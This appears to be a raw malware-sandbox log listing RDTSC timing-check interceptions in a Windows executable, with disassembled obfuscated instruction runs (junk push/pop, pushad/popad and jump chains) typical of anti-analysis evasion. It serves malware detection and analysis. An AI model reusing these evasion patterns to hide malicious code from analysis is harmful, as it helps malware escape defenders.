          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5250800 second address: 5250806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5250806 second address: 525080C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525080C second address: 5250864 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 pushad 0x0000000a call 00007FE1C8D8FEBCh 0x0000000f pushfd 0x00000010 jmp 00007FE1C8D8FEC2h 0x00000015 jmp 00007FE1C8D8FEC5h 0x0000001a popfd 0x0000001b pop ecx 0x0000001c mov edx, 0243DF54h 0x00000021 popad 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FE1C8D8FEBFh 0x0000002a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5250864 second address: 525086A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525086A second address: 525086E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525086E second address: 52508AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b jmp 00007FE1C8D96877h 0x00000010 lea eax, dword ptr [ebp-04h] 0x00000013 pushad 0x00000014 mov si, F08Bh 0x00000018 mov bx, ax 0x0000001b popad 0x0000001c nop 0x0000001d jmp 00007FE1C8D9686Ah 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52508AE second address: 52508CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D8FEC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5250938 second address: 525093C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525093C second address: 5250942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5250942 second address: 5250951 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE1C8D9686Bh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5250951 second address: 5250955 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52509F2 second address: 5250A05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D9686Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5250A05 second address: 525000D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D8FEC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a jmp 00007FE1C8D8FEBEh 0x0000000f retn 0004h 0x00000012 nop 0x00000013 sub esp, 04h 0x00000016 xor ebx, ebx 0x00000018 cmp eax, 00000000h 0x0000001b je 00007FE1C8D90005h 0x00000021 xor eax, eax 0x00000023 mov dword ptr [esp], 00000000h 0x0000002a mov dword ptr [esp+04h], 00000000h 0x00000032 call 00007FE1CD94BA0Bh 0x00000037 mov edi, edi 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c pushad 0x0000003d popad 0x0000003e mov ebx, 6A64087Ch 0x00000043 popad 0x00000044 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525000D second address: 5250013 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5250013 second address: 5250017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5250017 second address: 525001B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525001B second address: 5250043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FE1C8D8FEC8h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5250043 second address: 5250047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5250047 second address: 525004D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525004D second address: 5250053 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5250053 second address: 5250057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5250057 second address: 525005B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525005B second address: 525007E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE1C8D8FEC8h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525007E second address: 52500A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D9686Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov di, ax 0x0000000f push eax 0x00000010 mov edi, 3DECD7D2h 0x00000015 pop edx 0x00000016 popad 0x00000017 push FFFFFFFEh 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e mov di, A264h 0x00000022 popad 0x00000023 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52500A7 second address: 525011F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D8FEBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 5014473Dh 0x0000000e jmp 00007FE1C8D8FEC1h 0x00000013 add dword ptr [esp], 2596570Bh 0x0000001a pushad 0x0000001b mov bx, cx 0x0000001e pushfd 0x0000001f jmp 00007FE1C8D8FEC8h 0x00000024 add ah, 00000078h 0x00000027 jmp 00007FE1C8D8FEBBh 0x0000002c popfd 0x0000002d popad 0x0000002e call 00007FE1C8D8FEB9h 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FE1C8D8FEC5h 0x0000003a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525011F second address: 5250125 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5250125 second address: 5250129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5250129 second address: 5250149 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D96873h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5250149 second address: 525014F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525014F second address: 525016B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE1C8D96878h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525016B second address: 5250197 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007FE1C8D8FEBEh 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FE1C8D8FEBEh 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5250197 second address: 52501CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE1C8D96871h 0x00000008 mov bl, ch 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FE1C8D96879h 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52501CF second address: 5250203 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D8FEC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b mov ecx, 0706C793h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FE1C8D8FEC6h 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5250203 second address: 5250236 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr fs:[00000000h] 0x0000000d jmp 00007FE1C8D9686Ch 0x00000012 nop 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FE1C8D96877h 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5250236 second address: 52502A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D8FEC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FE1C8D8FEBAh 0x00000013 or esi, 3DF0B408h 0x00000019 jmp 00007FE1C8D8FEBBh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007FE1C8D8FEC8h 0x00000025 jmp 00007FE1C8D8FEC5h 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52502A4 second address: 52502E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D96871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FE1C8D9686Eh 0x0000000f sub esp, 18h 0x00000012 jmp 00007FE1C8D96870h 0x00000017 xchg eax, ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52502E2 second address: 52502E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52502E8 second address: 52502F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE1C8D9686Bh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52502F7 second address: 52502FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52502FB second address: 525030C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e mov ecx, edx 0x00000010 popad 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525030C second address: 5250312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5250312 second address: 5250316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5250316 second address: 52503B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D8FEC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d mov cx, 113Dh 0x00000011 pushfd 0x00000012 jmp 00007FE1C8D8FEBAh 0x00000017 or esi, 413D7318h 0x0000001d jmp 00007FE1C8D8FEBBh 0x00000022 popfd 0x00000023 popad 0x00000024 xchg eax, esi 0x00000025 jmp 00007FE1C8D8FEC6h 0x0000002a push eax 0x0000002b jmp 00007FE1C8D8FEBBh 0x00000030 xchg eax, esi 0x00000031 jmp 00007FE1C8D8FEC6h 0x00000036 xchg eax, edi 0x00000037 jmp 00007FE1C8D8FEC0h 0x0000003c push eax 0x0000003d jmp 00007FE1C8D8FEBBh 0x00000042 xchg eax, edi 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 popad 0x00000049 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52503B0 second address: 52503CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D96877h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52503CB second address: 5250447 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D8FEC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [75AB4538h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FE1C8D8FEC3h 0x00000017 add ax, 220Eh 0x0000001c jmp 00007FE1C8D8FEC9h 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007FE1C8D8FEC0h 0x00000028 add eax, 5507B088h 0x0000002e jmp 00007FE1C8D8FEBBh 0x00000033 popfd 0x00000034 popad 0x00000035 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5250447 second address: 525045F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE1C8D96874h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525045F second address: 525047D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D8FEBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [ebp-08h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov di, 0656h 0x00000015 push ebx 0x00000016 pop eax 0x00000017 popad 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52505B5 second address: 52505C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D9686Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52505C4 second address: 5250697 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D8FEC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000018h] 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FE1C8D8FEBCh 0x00000016 adc eax, 591F1DD8h 0x0000001c jmp 00007FE1C8D8FEBBh 0x00000021 popfd 0x00000022 call 00007FE1C8D8FEC8h 0x00000027 mov dl, ch 0x00000029 pop edi 0x0000002a popad 0x0000002b mov ecx, dword ptr [eax+00000FDCh] 0x00000031 pushad 0x00000032 call 00007FE1C8D8FEC8h 0x00000037 push eax 0x00000038 pop ebx 0x00000039 pop eax 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007FE1C8D8FEBDh 0x00000041 or ecx, 0947C186h 0x00000047 jmp 00007FE1C8D8FEC1h 0x0000004c popfd 0x0000004d pushfd 0x0000004e jmp 00007FE1C8D8FEC0h 0x00000053 sbb ah, 00000028h 0x00000056 jmp 00007FE1C8D8FEBBh 0x0000005b popfd 0x0000005c popad 0x0000005d popad 0x0000005e test ecx, ecx 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 movsx ebx, cx 0x00000066 popad 0x00000067 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524001B second address: 52400EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE1C8D9686Fh 0x00000009 sub cl, FFFFFFCEh 0x0000000c jmp 00007FE1C8D96879h 0x00000011 popfd 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 movzx eax, dx 0x0000001c popad 0x0000001d push eax 0x0000001e jmp 00007FE1C8D9686Bh 0x00000023 xchg eax, ebp 0x00000024 jmp 00007FE1C8D96876h 0x00000029 mov ebp, esp 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FE1C8D9686Eh 0x00000032 xor si, 80D8h 0x00000037 jmp 00007FE1C8D9686Bh 0x0000003c popfd 0x0000003d mov edx, ecx 0x0000003f popad 0x00000040 sub esp, 2Ch 0x00000043 pushad 0x00000044 pushad 0x00000045 pushad 0x00000046 popad 0x00000047 mov bl, cl 0x00000049 popad 0x0000004a pushfd 0x0000004b jmp 00007FE1C8D96879h 0x00000050 xor ax, 1326h 0x00000055 jmp 00007FE1C8D96871h 0x0000005a popfd 0x0000005b popad 0x0000005c xchg eax, ebx 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007FE1C8D9686Dh 0x00000064 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52401BF second address: 52401C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52401C3 second address: 52401C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52401C7 second address: 52401CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52401CD second address: 52401DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE1C8D9686Dh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52401DE second address: 524024A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test al, al 0x0000000a jmp 00007FE1C8D8FEBDh 0x0000000f je 00007FE1C8D9013Ch 0x00000015 pushad 0x00000016 mov dx, ax 0x00000019 pushfd 0x0000001a jmp 00007FE1C8D8FEC8h 0x0000001f sub al, FFFFFFF8h 0x00000022 jmp 00007FE1C8D8FEBBh 0x00000027 popfd 0x00000028 popad 0x00000029 lea ecx, dword ptr [ebp-14h] 0x0000002c jmp 00007FE1C8D8FEC6h 0x00000031 mov dword ptr [ebp-14h], edi 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524024A second address: 524024E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524024E second address: 524026B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D8FEC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52402DB second address: 5240344 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FE1C8D96878h 0x00000008 sbb ch, 00000008h 0x0000000b jmp 00007FE1C8D9686Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov si, 547Fh 0x00000017 popad 0x00000018 nop 0x00000019 jmp 00007FE1C8D96872h 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FE1C8D9686Ch 0x00000028 and ax, EB98h 0x0000002d jmp 00007FE1C8D9686Bh 0x00000032 popfd 0x00000033 push eax 0x00000034 pop ebx 0x00000035 popad 0x00000036 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52403A2 second address: 52403A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52403A8 second address: 5240455 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FE1C8D96875h 0x00000011 xor esi, 3645CD56h 0x00000017 jmp 00007FE1C8D96871h 0x0000001c popfd 0x0000001d push ecx 0x0000001e mov bl, CEh 0x00000020 pop eax 0x00000021 popad 0x00000022 jg 00007FE2395B490Ch 0x00000028 jmp 00007FE1C8D9686Fh 0x0000002d js 00007FE1C8D968E6h 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007FE1C8D96874h 0x0000003a or al, FFFFFFD8h 0x0000003d jmp 00007FE1C8D9686Bh 0x00000042 popfd 0x00000043 mov ecx, 2438B88Fh 0x00000048 popad 0x00000049 cmp dword ptr [ebp-14h], edi 0x0000004c jmp 00007FE1C8D96872h 0x00000051 jne 00007FE2395B48C0h 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007FE1C8D9686Ah 0x00000060 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5240455 second address: 5240464 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D8FEBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5240464 second address: 52404CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D96879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d call 00007FE1C8D9686Ch 0x00000012 mov ch, 31h 0x00000014 pop edi 0x00000015 movzx eax, di 0x00000018 popad 0x00000019 lea eax, dword ptr [ebp-2Ch] 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushfd 0x00000020 jmp 00007FE1C8D9686Bh 0x00000025 xor ecx, 1014FCBEh 0x0000002b jmp 00007FE1C8D96879h 0x00000030 popfd 0x00000031 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52404CA second address: 5240569 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 7CC50207h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov bx, ax 0x0000000c popad 0x0000000d xchg eax, esi 0x0000000e jmp 00007FE1C8D8FEC6h 0x00000013 push eax 0x00000014 pushad 0x00000015 mov bx, 5794h 0x00000019 mov ebx, 00DA5900h 0x0000001e popad 0x0000001f xchg eax, esi 0x00000020 jmp 00007FE1C8D8FEBFh 0x00000025 nop 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FE1C8D8FEC4h 0x0000002d adc al, 00000078h 0x00000030 jmp 00007FE1C8D8FEBBh 0x00000035 popfd 0x00000036 pushfd 0x00000037 jmp 00007FE1C8D8FEC8h 0x0000003c sbb si, CCD8h 0x00000041 jmp 00007FE1C8D8FEBBh 0x00000046 popfd 0x00000047 popad 0x00000048 push eax 0x00000049 pushad 0x0000004a mov al, bh 0x0000004c mov ah, D9h 0x0000004e popad 0x0000004f nop 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5240569 second address: 524056D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524056D second address: 5240581 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D8FEC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524066D second address: 5240673 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5240673 second address: 5240677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230E1D second address: 5230E56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D96879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FE1C8D9686Eh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov eax, ebx 0x00000016 mov edx, 1877162Ch 0x0000001b popad 0x0000001c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230E56 second address: 5230E6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE1C8D8FEC1h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230E6B second address: 5230E6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230E6F second address: 5230E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230E7E second address: 5230E82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230E82 second address: 5230E88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
